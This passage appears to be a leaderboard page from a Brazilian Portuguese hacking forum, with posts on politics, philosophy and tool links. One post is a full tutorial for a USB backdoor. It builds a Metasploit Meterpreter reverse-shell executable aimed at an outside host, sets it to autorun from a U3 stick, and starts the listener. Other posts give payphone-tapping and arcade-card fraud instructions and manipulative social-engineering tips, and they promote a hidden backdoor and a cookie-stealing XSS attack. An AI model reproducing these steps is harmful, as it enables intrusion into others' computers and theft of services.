indesejado/mal-intencionado; - Limitar a taxa da banda quando estiver sob ataque; - Permitir que seja executado um proxy HTTPS para proteger o seu site através de um proxy/servidor externo (Você precisa executar manualmente a verificação do SSL pela primeira vez). DEMO: https://asciinema.org/a/elow8qggzb7q6durjpbxsmk6r REPOSITÓRIO DO NSHIELD: https://github.com/fnzv/nShield oanalista.com.br
  22. 1 ponto
    Recomendo que você sempre procure pela documentação desses softwares. É muito mais fácil do que olhar tutoriais na rede.
  23. 1 ponto
    Eu concordo, mas acho que a pirataria seria bem menor em comparação com a atualidade. A verdade é que desenvolvemos isso como forma de fugir do inimigo que não podemos vencer sozinho. A nossa desonestidade não é espontânea, ao longo de céculos nós fomos forçados a isso como forma de fugir do Estado. A parte que muito me incomoda é que tem gente que é iludido achando que o Estado é o salvador da pátria. Da mesma forma que num sistema livre as pessoas podem ser gananciosas e desonestas, praticar corporativismo e tudo mais, num mundo regrado pelo Estado isso também acontece. Nós não podemos dar poder ao Estado porque o controle e comportamento do Estado depende da índole de quem está no controle, na URSS o Estado dominava todas as esferas da sociedade e em teoria ele podia mudar a vida das pessoas, só que quando os ditadores entravam no governo virava um massacre, corporativistas são a mesma coisa, querem adquirir para si todo o mercado e assim podem ditar preços e adquirir lucros altos. Os esquerdistas criticam tanto o livre mercado, reclamam que a telefonia móvel é ruim, mas esquecem que o indicado da Dilma para assumir a ANATEL era um corporativista de merda que fez lobby para as companhias telefônicas durante todo o governo, enchem o mercado de regulações e depois querem falar que é "livre mercado", como dizemos, livre é quando ele realmente é livre. Nós da TI somos os principais benefiados pelo capitalismo, as peças que consumimos são todas fabricadas em outros países, a maioria dos eletrônicos, têm seus projetos feitos nos EUA e a produção em massa na China, daí sempre tem um idiota que vem meter essa de que o Capitalismo é ruim para nós, é realmente muita demência e cegueira por ideologia. Eu não acho que o problema do mundo seja o capitalismo, o problema do mundo são as pessoas e não devemos nunca esquecer que o Estado defendido pelos anti-capitalistas é composto por pessoas e na maioria das vezes essas mesmas pessoas que defendem um Estado grande e regulador no mercado, são corporativistas ferrenhos, apenas querendo ganhar espaço para si mesmos.
  24. 1 ponto
    Excelente abordagem do tema. De fato, muitas pessoas pensam ser somente sobre "capitalismo isso e aquilo". Quando conforme foi dito, o capitalismo nunca foi o erro. O erro somos nós. Nós quando negligenciamos toda essa imundice que é nos empurrada goela a baixo. Quando nos contentamos em assistir a série e pensamos: "Maneiro, agora eu abri meus olhos" "As conspirações" Bom, de fato elas existem. E essa minoria corporativista que domina o nosso mundo. Inclusive a nossa "liberdade" na rede. Eles só serão punidos quando nós tivermos a visão de que o erro não é só um lado social ou um ponto de vista. Mas infelizmente, uma frase antiga ainda será muito dita. Antes de mudar o mundo, você deve mudar o homem no espelho. É normal aqui no país ouvir algo como: - "a taxa de jogos(de vídeo-game)é um absurdo. Se fosse mais barato eu comprava." Será? Mesmo se o atual jogo de R$:200,00 fosse vendido a R$:30,00 Ainda existiria pirataria de 3 por 15. A questão não é a pirataria ou não, mas sim, de que nossos ideais, metas e moral, são facilmente ignorados pelo input de merda que nos fazem ver todo dia. A questão dos jogos é que mesmo que se quebrássemos isso tudo, o problema ainda seriamos nós. Essa merda é quase cultural. Não adianta quebrar todo o conglomerado Se o pensamento do povo ainda for o mesmo daqueles que estavam lá. Infelizmente. Pra nascer bom e nascer decente, só deixando de ser "gente".
  25. 1 ponto
    Já aproveitando pra fazer uma sugestão, seria interessante deixar a mostra pra quem visualizar X perfil que foi alterado, a informação de que o nick anterior daquela pessoa era Y
  26. 1 ponto
    Iremos construir um pendrive USB U3, de modo que quando conectado a um PC, realize uma conexão reversa com o Meterpreter.A idéia é gerar, com o Metasploit, um arquivo executável com um payload para gerar uma conexão reversa ao conectar o pendrive na USB do PC. Para gravar o payload dentro do U3, usaremos o programa Universal Customizer. Gerar o payload com o Metasploitvamos criar um executável com uma conexão reversa do Meterpreter:msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X >malware.exe Criar nossa ISOUma vez que tenhamos baixado o Universal Customizer, copiamos o arquivo malware.exe para o diretório “U3CUSTOM” e criamos o arquivo “autorun.inf” com o seguinte conteúdo:[AutoRun]open=malware.exeApós isso, executamos o “ISOCreate.cmd” e dentro do diretório “BIN” será criada nossa ISO com o nome“U3CUSTOM.ISO”. Se não criarmos nossa ISO , o Universal Customizer utilizará a ISO “U3CUSTOM.ISO” que já vem dentro do pacote, com uma versão feita por Hacksaw. Gravar a ISOIniciamos o Universal Customizer e vamos seguindo os passo:Ao finalizar, retiramos o pendrive, e quando voltarmos a conectá-lo já teremos nosso payload sendo executado.Aguardando a conexmo reversaPara finalizar, devemos deixar o meterpreter “escutando” à espera da conexão reversa que será feita pelo payload gravado no pendrive:./msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 1.1.1.1set LPORT 443set ExitOnSession falseexploit -j É isso pessoal o processo é basicamente a criação de uma backdoor coloca-la no PenDriver e Criar o Arquivo “autorun.inf” colocar o meterpreter em modo escuta e aguardar. By Wheezy ^^
  27. 1 ponto
    O DARK_FILES está finalizado galera! Ontem postei sobre ele no Facebook pedindo ajuda na questão da criptografia e, hoje, após um dia inteiro trabalhando nele consegui fazer uma criptografia FODA e finalizá-lo! Pra quem tiver interesse em conhecer: http://darkfiles.hk.tn/ O QUE É: Hospedagem de arquivos 100% anônima (criptografia individual), limpa (sem anúncios/espera), segura e sem deixar rastros (server anon na Espanha, rs). Aqui seus arquivos 'dark' ficarão seguros. ~Por enquanto~ o upload máximo é 10MB, mas logo logo vai ser alterado pra mais. QUALQUER crítica/sugestão é muito bem vinda e vai ajudar muito. Fiz esse projeto pra estudo, com inspiração no antigo ObscuredFiles. Façam bom uso
  28. 1 ponto
    Tem varias postagens no grupo do Facebook e aqui também sobre isso. Da uma procura.
  29. 1 ponto
    Credito ao nosso membro: Daniel Vieira 1º Tutorial Efetuando ligações gratuitamente utilizando um diodo! [PHREAKING / TELEFONE PÚBLICO / INTERNET GRÁTIS] O diodo é um componente eletrônico que possui diversas utilizações. Podemos resumir seu funcionamento basicamente na seguinte síntese: Um diodo (ou junção PN), permite que a corrente circule em apenas uma direção dentro de um circuito. Ao se utilizá-lo para o fim aqui desejado, vamos precisar de um diodo IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente em qualquer casa de componentes eletrônicos. Vamos precisar também de um resistor com valor nominal de 22K e potência de 1W. Descasque os fios do telefone e ligue cada uma das pontas obtidas com o diodo e o resistor neles. Lembre-se: você vai apenas descascar os fios do orelhão!!! Se você cortá-los, ele vai ficar sem linha. ================================================ [ANTES] ------------------------... Fio 1 ------------------------... Fio 2 ================================================ [DEPOIS] ------------{DR}---------... Fio 1 -------------------------... Fio 2 ================================================ ou... -------------------------... Fio 1 ------------{DR}---------... Fio 2 ================================================ ou...[/align] ----------{=-------------... Fio 1 ´´´´´´´´´´´ D ´´´´´´´´´´´ R -----------=}------------... Fio 2 ================================================ Legenda: DR = diodo+resistor ================================================ Se o telefone ficar mudo, inverta o lado do diodo para liberar a conexão. [/align] Caso seja mais ousado, já que os fios do telefone já foram raspados, só plugar um telefone fixo de casa mesmo e ele fará ligações de graça. Caso queira usar internet discada em um notebook, fica a seu critério também! undefined;) undefined(y)[/align] "Conhecimento não é crime, compartilhe!" Obs.: Não me responsabilizo pelo mal uso desses métodos* ============================================================================================================================================= 2º Tutorial [FLIPERAMA GRÁTIS] [Sabe aqueles cartões magnéticos de fliperama? Então, use uma fita cassete daquelas de vídeo cassete mesmo antigos, sério, mas tem que ser uma fita virgem. -Corte uma tira de magnético de fita virgem cassete de vídeo. -Coloque com alguma coisa durex ou fita crepe / fita isolante. -Faça isso em cima do magneto do cartão. -Coloque o cartão na máquina de fliper, não deu certo? ...vá tentando pra um lado e pro outro até dar créditos, uma hora vai dar certo nem que seja naquela máquina ruim de jogo ruim, mas com certeza uma máquina ou outra vai dar créditos! Fiz isso a muuuuuuitos anos atrás, e recomendo! Não funciona em todas as máquinas, mas tem umas que dão até mais de 1 crédito por tentativa. Boas diversões... Obs.: Não me responsabilizo pelo mau uso destes métodos* "Conhecimento não é crime, compartilhe!"
  30. 1 ponto
  31. 1 ponto
    Fala aí galera! Já falei pra vocês desse novo site que tem trazido um conteúdo bem bacana sobre forense digital. Hoje, o artigo fala sobre investigação forense de cibercrimes. Enjoy! http://academiadeforensedigital.com.br/investigacao-forense-de-cibercrime/
  32. 1 ponto
    O projeto tem como objetivo aumentar a comunidade de TI e a partilha e evolução de conhecimento na comunidade . Nesse projeto vamos criar uma sala principal em que serão efectuadas aulas regularmente, projetos e será um local para compartilha de materiais e conhecimentos. As aulas vão se focar mais em programação e segurança, mas haverá também aulas de hardware e tudo o que esteja relacionado com TI. Qualquer um poderá dar aulas. Desde que saiba o que está a fazer Vamos também criar uma equipa ctf para entrar em competições online. A equipa vai ter acesso a uma sala , que não é a principal, para treinar e evoluir VIDEO PROMO: https://streamable.com/llk31 Forum: http://zqxu53dyyfuguvn7.onion/
  33. 1 ponto
  34. 1 ponto
    Kk eae pessoas trago pra vcs uma pasta minha do Google Drive ela ta meio bagunçada mas ta izi: https://drive.google.com/folderview?id=0BxB0EuGgfBxWOTJubURRUVRrSW8
  35. 1 ponto
    [Full - Material / Conteúdo] 0.4 - Olá soldados da Fsociety Brasil! Venho hoje compartilhar uma pasta no MEGA que nela contém conteúdos sobre: BOOTSTRAP, GOOGLE CHART TOOLS, HTML, HTML5, CSS, CSS3, HTTP e WEB DESIGN RESPONSIVO. ( Espero que gostem ) LINK --> https://goo.gl/UKbQmC LINK --> https://goo.gl/UKbQmC LINK --> https://goo.gl/UKbQmC
  36. 1 ponto
    Seja bem vindo! o/
  37. 1 ponto
    Opa! Prazer, me chamo Animus e tenho 16 anos tbm. Não sei muito sobre Pentest e gostaria de trocar conhecimento com pessoas que tbm estão começando. Me chama no chat
  38. 1 ponto
    Olá soldados da Fsociety Brasil! Venho hoje compartilhar um PDF do Livro "Guia do Hacker". É bem interessante, explica a maioria dos conceitos. ( Espero que gostem ) LINK --> https://goo.gl/nKqzzA LINK --> https://goo.gl/nKqzzA LINK --> https://goo.gl/nKqzzA
  39. 1 ponto
    Conteúdo pra caramba já vou botar pra baixar por que nunca se sabe se amanhã ainda está disponível né? Valeu!!
  40. 1 ponto
  41. 1 ponto
  42. 1 ponto
    Olá amiguinhos, tudo bem? Vou contar como usei e aperfeicoei minhas técnicas de engenharia social para conseguir benefícios no meu cotidiano ao longo dos anos. Isso inclui coonseguir desde a senha do Wifi, até sexo com as amiguinhas <3 Antes de tudo uma pausa para um comercial dos nossos patrocinadores Bom, primeiro eu devo-lhe advertir que isso não é feito de má intenção ou que vise prejudicar alguém, é apenas utilizar da psicologia humana para tornar as pessoas mais flexíveis. (todos sabemos que humanos são egoístas). 1 - Da que eu te dou outra. Vou usar como exemplo um caso recente. Em março deste ano (2017) eu conversei com o @Apoc a respeito da necessidade de Fabricar camisetas para angariar fundos para o projeto e obviamente, renovar o contrato dos servidores que acaba em setembro. Daí, então eu fui a uma loja para fazer um orçamento e conversa vai, conversa vem... Precisei mostrar a estampa para a recepcionista da confcção (estava no google Drive), sem um pacote de dados eu precisava de wifi (olhei pro roteador dela na hora) e na maior naturalidade eu pedi a senha para que pusesse acessar a rede e mostrar a estampa e a moça simplesmente me falou a senha, mesmo sem compromisso algum comigo. Ou seja, eu ganhei acesso a uma rede privada apenas PEDINDO, obviamente não foi apenas um pedido, mas um pedido contextualizado. Blz, mas e daí? -E daí que é disso que você precisa! Uma situação pra justificar o seu pedido. Eu vou explicar de uma forma que você possa compreender. Segundo a psicologia humana, As pessoas tendem a ser avessas as outras caso notem algum interesse da sua contra-parte. Ex: Quando você pede algo para alguém desconhecido a primeira reação da pessoa é negar. Afinal, ela nem te conhece, porém, se você oferecer algo antes, sem pedir nada em troca, a pessoa adotará uma posição flexivel aos seus próximos pedidos, resumindo. ANTES DE PEDIR UM FAVOR, FAÇA UM SEM COBRAR NADA! Aquela pessoa que você beneficiou (ou que de alguma forma se propôs a beneficiar, como a recepcionista da confeção seria beneficiada com um cliente novo) se sentirá em divida com você e não saberá negar um pedido simples ou que não cause danos. Essa técnica da senha do Wi-Fi pode ser usada em qualquer lugar, você só precisa criar uma situação favorável para si e desfavorável para o alvo. Algo similar ao ataque de Kevin Mitnick à Motorola. A parte de conseguir sexo com as amiguinhas eu conto outro dia, pq é preciso ensinar mais alguns truques de comportamento, autocontrole emocional e também uma lista imensa do que não fazer.
  43. 1 ponto
    Vou ser bem direto... Quero navegar na Rede Tor, mas pelo vídeo do Koshimaru Kisara ele fala que para um bom anonimato é preciso usar uma VPN junto com o Tor, mas minha duvida é a seguinte: Se o Tails é em live CD e é removido tudo quando reinicia, teria que instalar a VPN toda vez que abro o Tails ? É necessário/Recomendado usar a VPN ? Ou só quando está por Virtual Machine ? Agradeço desde já
  44. 1 ponto
    Aew Thyago, tu já é de casa. Mas se sinta mais à vontade. Continue assim! <3
  45. 1 ponto
    Eae pessoal, hoje trago à vocês, um vídeo ensinando a fazer uma backdoor 100% FUD com o script Powershell Empire.
  46. 1 ponto
    github https://github.com/i3visio/osrframework Instalação 1. git clone https://github.com/i3visio/osrframework 2. pip install osrframework 3. pip install osrframework --upgrade 4. cd osrframework/osrframework/ Exemplos usufy.py -n USER -p twitter usufy.py -n USER -p facebook usufy.py -n USER -p facebook twitter usufy.py -n USER USER -p twitter facebook usufy.py -n USER -p all
  47. 1 ponto
    Se em mares escuros se escondem os peixes abissais Se nesse mundo errôneo, sozinhos ficamos Alheios aos sonhos neutros, aos barcos de flutuam no cais. Se nas florestas negras, escuras, amamos... Se na incerteza lânguida do ser, Fitamos nossos olhos, esperando uma resposta. Sentamo-nos juntos na espera do querer. Esperando que o passado um dia volta. Se o início não há, explosão. Se penso nossa origem, sento em vão. Se olhamos às paredes escuras (pensando), solidão... Na vaga presença da dúvida, No deleite do não saber aparento. Se quando penso na origem, me arrependo... Na balada desse soneto, quero abrir uma questão... a inconsistência da existência. Não sabemos ao certo o que somos, de onde viemos e como saberemos isso. Somente estipulamos teorias sobre como o mundo foi criado. Sobre como o UNIVERSO e toda sua vastidão foi criado. Mesmo sendo ateu, me pego pensando na existência divina... string nada = 'Absoluta não-existência' Imagine o nada... sim o nada, o absoluto nada... era isso que o universo era, nada. É impossível que uma massa densa tenha nascido no nada, para o nada. O nada seria uma imensidão vazia, sem preto, sem branco, sem cor. Assim como uma pedra enxerga. Agora imagine uma bola grande, muito grande (que contenha tudo do universo) essa bola se explodiu e dentre bilhões de anos planetas se formaram... agora qual a probabilidade de que dentre googolplexes de planetas e esferas que se espalham pelo universo, somente um aparenta ter vida aparente? Isso o Paradoxo de Fermi tenta 'explicar'. Com isso, temos a dúvida da existência da vida por meio do Big Bang. Ou seja, não houve início, somente o instante inicial. Que faz com que dentre zilhões de planetas, um tenha condições especificamente perfeitas para que a vida ocorra. Ou seja, mesmo sendo ateu, acredito na possível existência de uma ser denotado designer que modelou o universo. Se pularmos para a existência divina, veremos que o que muda é o modo como foi criado. Imagine um ser que existe desde TODA A ETERNIDADE, ou seja, ele nunca nasceu... nunca foi criado? Quantos universos/multiversos/dimensões ele pode ter criado em conjunto ou juntamente à nossa? Ou seja, se segundo algumas religiões o mundo tem cerca de 5 mil anos o que ele esteve fazendo todo esse tempo? Fazendo cálculos e mais cálculos? Seria toda a imensidão do universo, cada uma das tentativas frustrantes e errôneas da criação do mundo e somos os únicos que fomos criados com perfeição? Agora, por que que um ser (ou mais, dependendo da crença) existiria? Onde ele vive? Isso então prova que vivemos numa Matrix, ou seja, vivemos numa dimensão separada da "correta", onde o ser criador vive numa outra dimensão, o "céu" (ou inglês Heaven). E me pergunto, por que ele criou a humanidade? Ele quis fazer seres para sofrerem? Será? Onde ele está agora? É uma incerteza contínua na correnteza vital, somente nós no infinito espaço-tempo negro. Nós, a gravidade, e a solidão contígua. Por isso, prefiro seguir a filosofia niilista, onde o mundo é incerto... pois o que é a vida? Quando imagino que eu realmente existo, e não sei por que, me pergunto o que é a existência, para os seres cavernosos, é uma pergunta tola. Mas eu retruco... o que seria a não-existência? Quando morremos, simplesmente não existimos, estamos em constante mudança, como diria Descartes... penso, logo existo... é a definição da incerteza, da dúvida do ser-ou-não-ser. Então pergunto à vocês, o que imaginam ser a vida?
  48. 1 ponto
    Ataque de XSS persistente Hoje trago a vocês, um vídeo, ensinando a realizar um ataque de Cross Site Scripting no modo Stored (Persistente), ou seja, um ataque de XSS não refletido, que no caso altera o servidor através do cliente. Como por exemplo, vamos supor que tem um fórum e esse fórum é vulnerável se você executar um código malicioso em JS ou HTML com o seu cookielogger, você consegue fazer com que todos que acessem aquela página entrem em seu cookielogger. Demonstração e melhor explicação no vídeo abaixo. ######################################
  49. 1 ponto
    Bom, eu utilizo sempre o que preciso e acho uma dica super válida. Inclusive eu acho bem melhor do que a solução Whonix. [video=youtube]
  50. 1 ponto
    Tem um pensamento, que não me recordo de quem é, que diz que não se tem como mensurar o nada (inexistente), pois, a partir do momento que você dá sentido ao Nada, ele passa a existir, só o fato de você estar pensando no Nada já o faz ele existir, consequentemente deixando de não existir. Essas coisas dão um nó na cabeça. Agora, pare de pensar na possibilidade do Universo ter sido criado. E se ele sempre existiu? E se ele não segue a linha "padrão" que seguimos? (nascer, viver, morrer) Considerando que o Universo sempre existiu, já abre mais um leque enorme de teorias e possibilidades e não creio que seja algo impossível de ser verdade.
Esta tabela de classificação está definida como São Paulo/GMT-03:00
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.